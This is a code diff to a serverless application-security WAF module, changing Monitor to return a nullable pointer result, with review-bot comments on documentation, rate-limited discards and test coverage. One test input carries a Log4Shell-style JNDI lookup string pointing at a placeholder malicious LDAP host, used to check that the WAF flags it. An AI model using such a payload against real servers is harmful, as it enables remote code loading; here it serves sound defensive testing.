diff --git a/pkg/serverless/appsec/appsec.go b/pkg/serverless/appsec/appsec.go
index d0147a40d63e6..10fb6aaf55eb0 100644
--- a/pkg/serverless/appsec/appsec.go
+++ b/pkg/serverless/appsec/appsec.go
@@ -110,11 +110,11 @@ func (a *AppSec) Close() error {
 // Monitor runs the security event rules and return the events as a slice
 // The monitored addresses are all persistent addresses
-func (a *AppSec) Monitor(addresses map[string]any) (res waf.Result) {
+func (a *AppSec) Monitor(addresses map[string]any) *waf.Result {
 log.Debugf("appsec: monitoring the request context %v", addresses)
 ctx := waf.NewContext(a.handle)
 if ctx == nil {
- return res
+ return nil
 }
 defer ctx.Close()
 timeout := a.cfg.WafTimeout
@@ -130,7 +130,7 @@ func (a *AppSec) Monitor(addresses map[string]any) (res waf.Result) {
 log.Debugf("appsec: waf timeout value of %s reached", timeout)
 } else {
 log.Errorf("appsec: unexpected waf execution error: %v", err)
- return res
+ return nil
 }
 }
@@ -140,9 +140,9 @@ func (a *AppSec) Monitor(addresses map[string]any) (res waf.Result) {
 }
 if !a.eventsRateLimiter.Allow() {
 log.Debugf("appsec: security events discarded: the rate limit of %d events/s is reached", a.cfg.TraceRateLimit)
- res = waf.Result{}
+ return nil
 }
- return res
+ return &res
 }
 // wafHealth is a simple test helper that returns the same thing as `waf.Health`
diff --git a/pkg/serverless/appsec/appsec_test.go b/pkg/serverless/appsec/appsec_test.go
index ba6c1b0e42a0c..78d330fa49e40 100644
--- a/pkg/serverless/appsec/appsec_test.go
+++ b/pkg/serverless/appsec/appsec_test.go
@@ -69,8 +69,9 @@ func TestMonitor(t *testing.T) {
 },
 "server.request.body": "eyJ0ZXN0I${jndi:ldap://16.0.2.staging.malicious.server/a}joiYm9keSJ9",
 }
- events := asm.Monitor(addresses)
- require.NotNil(t, events)
+ res := asm.Monitor(addresses)
+ require.NotNil(t, res)
+ require.True(t, res.HasEvents())
 })
 t.Run("api-security", func(t *testing.T) {
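Review bot: The doc comment above `Monitor` still says it returns "the events as a slice", but the new signature returns `*waf.Result` and the `ctx == nil` branch now returns nil. Callers need to know that nil is a valid outcome, so I would reword it along the lines of `// Monitor runs the security rules against the given addresses and returns the WAF result, or nil when the WAF could not run or the result was discarded.` The `ctx == nil` branch also returns without logging, so a request that went unmonitored leaves no trace; a `log.Debugf` there would make that fail-open path visible. The body of Monitor continues past this hunk, and the same nil return is used in the hunks at -130 and -140.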
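Review bot: The rate-limit branch in the hunk at -140 returns nil for the whole result, so a caller cannot tell "the WAF did not run" from "the result was discarded", and any derivatives computed for the request are dropped together with the events (as they were with `res = waf.Result{}`). The discard is logged only at debug level, so traffic above `a.cfg.TraceRateLimit` suppresses detections without any signal an operator would normally see; a counter or a rate-limited warning would make the loss measurable. If derivatives are meant to survive rate limiting, clearing only the events (`res.Events = nil`) and still returning `&res` would keep them. Whether `Allow()` is consulted only for results that carry events is not visible here, and `res` is declared outside the hunk.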
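Review bot: The updated "appsec" subtest only asserts the non-nil path, so nothing visible here pins the new nil contract of `Monitor`. A subtest that drives the rate limiter past its limit (or uses a closed handle) and asserts a nil result would catch a later change that reintroduces a zero-value return or a caller that dereferences without checking. TestMonitor starts and ends outside this hunk, so existing coverage elsewhere in the function cannot be ruled out.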
@@ -136,7 +137,8 @@ func TestMonitor(t *testing.T) {
 "query": {"$http_server_vars"},
 },
 })
- require.NotEmpty(t, res.Derivatives)
+ require.NotNil(t, res)
+ require.True(t, res.HasDerivatives())
 schema, err := json.Marshal(res.Derivatives)
 require.NoError(t, err)
 require.Equal(t, tc.schema, string(schema))
diff --git a/pkg/serverless/appsec/httpsec/http.go b/pkg/serverless/appsec/httpsec/http.go
index 7e3ab305057e3..1742e0208ddb7 100644
--- a/pkg/serverless/appsec/httpsec/http.go
+++ b/pkg/serverless/appsec/httpsec/http.go
@@ -31,7 +31,7 @@ import (
 // subprocessor monitoring the given security rules addresses and returning
 // the security events that matched.
 type Monitorer interface {
- Monitor(addresses map[string]any) waf.Result
+ Monitor(addresses map[string]any) *waf.Result
 }
 // AppSec monitoring context including the full list of monitored HTTP values
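Review bot: The comment on `Monitorer` does not say that `Monitor` may now return nil, which is the part of the contract that implementers and callers most need to know. The call sites in this package are outside the hunk, so I cannot confirm that they check for nil before reading the result; an unchecked dereference would panic in the request-handling path. I would add a line above the method such as `// Monitor returns nil when there is nothing to report.` and confirm that every caller guards the pointer.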